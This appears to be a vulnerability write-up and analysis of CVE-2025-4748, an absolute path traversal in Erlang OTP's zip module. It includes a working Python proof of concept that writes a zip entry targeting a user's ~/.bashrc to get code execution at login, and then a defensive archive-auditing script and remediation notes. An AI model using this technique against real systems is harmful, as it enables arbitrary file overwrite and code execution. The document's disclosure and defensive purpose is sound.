Full Report
There’s a new Erlang OTP vulnerability, CVE-2025-4748. It’s an Absolute Path Traversal vulnerability involving a Zip archive, which I have a lot of practice with. It affects Erlang OTP, which a coworker has already written about recently and noted the necessary steps to set up an environment. This is a “local” vulnerability (unless you’re unpacking a Zip archive as part of a network call), but is still fun to play with. Here’s how to reproduce:

## Setup

Similarly to the prior work of my coworker, set up an Ubuntu Jammy virtual machine and install Erlang.

```shell
wget https://binaries2.erlang-solutions.com/ubuntu/pool/contrib/e/esl-erlang/esl-erlang_25.3.2-1~ubuntu~jammy_amd64.deb
sudo dpkg -i esl-erlang_25.3.2-1\~ubuntu\~jammy_amd64.deb
sudo apt --fix-broken install
```

## Valid Test Case

Create a valid zip file to check the expected behavior.

```shell
touch emptyfile
zip valid.zip emptyfile
```

In the Erlang shell, unzip valid.zip to a destination directory of /tmp/:

```
~$ erl
Erlang/OTP 25 [erts-13.2.2] [source] [64-bit] [smp:4:4] [ds:4:4:10] [async-threads:1] [jit:ns]

Eshell V13.2.2 (abort with ^G)
1> {ok, FileList} = zip:unzip("valid.zip", [{cwd, "/tmp/"}]).
{ok,["/tmp/emptyfile"]}
```

And we see that, as expected, emptyfile was written to the destination directory as /tmp/emptyfile.

## PoC

From the CVE notes:

> When the zip module is used to extract files to disk and the archive is maliciously corrupted by including absolute file paths, the zip module would extract them as absolute paths instead of stripping the leading /, drive or device letter.

So this should be pretty easy: we’ll use a Python script to create a Zip archive with an absolute path of /home/remy/.bashrc and insert some code to demonstrate how we can leverage this vulnerability to overwrite a file leading to remote code execution, by printing Code exec via CVE-2025-4748.
```python
import io
import zipfile

# Build the archive in memory with a single member whose name is an absolute path.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("/home/remy/.bashrc", "echo 'Code exec via CVE-2025-4748'\n")

with open("poc.zip", "wb") as f:
    f.write(buf.getvalue())
```

Again, we’ll use the Erlang shell to decompress our poc.zip to a destination directory of /tmp/, but the vulnerability should instead clobber /home/remy/.bashrc.

```
~$ erl
Erlang/OTP 25 [erts-13.2.2] [source] [64-bit] [smp:4:4] [ds:4:4:10] [async-threads:1] [jit:ns]

Eshell V13.2.2 (abort with ^G)
1> {ok, FileList} = zip:unzip("poc.zip", [{cwd, "/tmp/"}]).
{ok,["/home/remy/.bashrc"]}
```

And yup, that worked. So next time the user remy logs in, the inserted code will execute when their ~/.bashrc is read.

```
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-141-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

New release '24.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Jun 17 15:28:17 2025 from 192.168.8.245
Code exec via CVE-2025-4748
remy@erlang:~$
```
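As an added example (not part of the original write-up or of the OTP zip module), the following Python audits an archive's member names before anything is extracted and applies the stripping the advisory describes: a leading /, drive or device prefix is removed, and `..` components are additionally rejected as a related CWE-22 check. The sample archive it builds is constructed here; its /home/remy/.bashrc entry mirrors the PoC above, and the function names are my own.

```python
import io
import ntpath
import posixpath
import zipfile

def member_path_issues(name):
    """Reasons a zip member name is unsafe to extract under a chosen cwd: the
    classes the advisory names (absolute path, drive/device letter) plus '..'."""
    issues = []
    normalized = name.replace("\\", "/")  # tolerate Windows-built archives
    if normalized.startswith("/"):
        issues.append("absolute path")
    drive, _ = ntpath.splitdrive(normalized)
    if drive:
        issues.append(f"drive or device prefix {drive!r}")
    parts = [p for p in normalized.split("/") if p not in ("", ".")]
    if ".." in parts:
        issues.append("parent directory traversal")
    return issues

def safe_member_path(name):
    """Relative path the member should land at, with leading '/', drive
    prefix and '.' components stripped; None if it would still escape cwd."""
    _, tail = ntpath.splitdrive(name.replace("\\", "/"))
    parts = [p for p in tail.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None
    return posixpath.join(*parts)

def audit_archive(data):
    """Scan every entry of an in-memory zip; return {name: issues} for unsafe ones."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            issues = member_path_issues(info.filename)
            if issues:
                findings[info.filename] = issues
    return findings

def build_sample_archive():
    """Constructed test archive: one benign entry and three unsafe ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("emptyfile", "")
        zf.writestr("/home/remy/.bashrc", "echo 'Code exec via CVE-2025-4748'\n")  # the PoC entry
        zf.writestr("C:/temp/outside.txt", "")   # drive letter, as the advisory mentions
        zf.writestr("../../outside.txt", "")     # classic traversal, added check
    return buf.getvalue()
```

Run `audit_archive` on untrusted archive bytes before calling the extractor and refuse the archive (or remap each entry via `safe_member_path`) when it returns any findings.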
Analysis Summary
# Vulnerability: Absolute Path Traversal in Erlang OTP Zip Module
## CVE Details
- CVE ID: CVE-2025-4748
- CVSS Score: N/A (not provided in the source; severity unknown, though the demonstrated arbitrary file overwrite suggests High severity)
- CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))
## Affected Systems
- Products: Erlang OTP (Stdlib modules: `zip:unzip/2` function)
- Versions: Erlang/OTP 25 (specifically tested with version 25.3.2)
- Configurations: Systems where the `zip:unzip/2` function is used to extract Zip archives that may contain maliciously crafted entries referencing absolute paths.
## Vulnerability Description
The vulnerability exists in the Erlang OTP zip module when extracting files. Specifically, the `zip:unzip/2` function fails to properly sanitize filenames contained within a Zip archive. If a file entry within the archive specifies an absolute path (e.g., starting with `/`), the module extracts the file to that absolute location on the disk instead of stripping the leading `/` or resolving the path relative to the specified `cwd` option. This allows an attacker to overwrite arbitrary files accessible by the user running the Erlang process.
## Exploitation
- Status: PoC available
- Complexity: Low (Requires creating a custom malicious Zip file and local file system access, or network access if the archive is downloaded/received)
- Attack Vector: Local (Can be exploited locally by triggering an extraction; becomes Network if the zip file is sourced from a network operation, leading potentially to Remote Code Execution (RCE) via shell profile corruption).
## Impact
- Confidentiality: Potential (Arbitrary file read, if a sensitive file is overwritten)
- Integrity: High (Confirmed ability to overwrite system files like `~/.bashrc`, leading to code execution upon next user login)
- Availability: Medium (Potential for denial of service via overwriting critical files)
## Remediation
### Patches
- No specific patch version was listed in the source material, but the vulnerability notes suggest an update to the zip module addressing path stripping is required. Users should check official Erlang/OTP advisories for the fixed version.
### Workarounds
- Avoid unpacking untrusted or unverified Zip archives using the Erlang `zip:unzip/2` function.
- Ensure that the Erlang process is running under the least privileged user possible to minimize the impact of arbitrary file overwrites.
## Detection
- Indicators of compromise: Unexpected modification or creation of sensitive system files (e.g., `/etc/passwd`, user configuration files like `~/.bashrc`, startup scripts) originating from an Erlang application process.
- Detection methods and tools: File integrity monitoring (FIM) solutions examining file write/modification events from Erlang processes, particularly around archive extraction operations.
## References
- Vendor advisories: Refer to the official Erlang/OTP security notifications released around June 2025.
- Relevant links - defanged:
- hxxps://www.cve.org/CVERecord?id=CVE-2025-4748
- hxxps://labs.greynoise.io/grimoire/2025-04-22-erlang-ssh (Contextual background on recent Erlang work)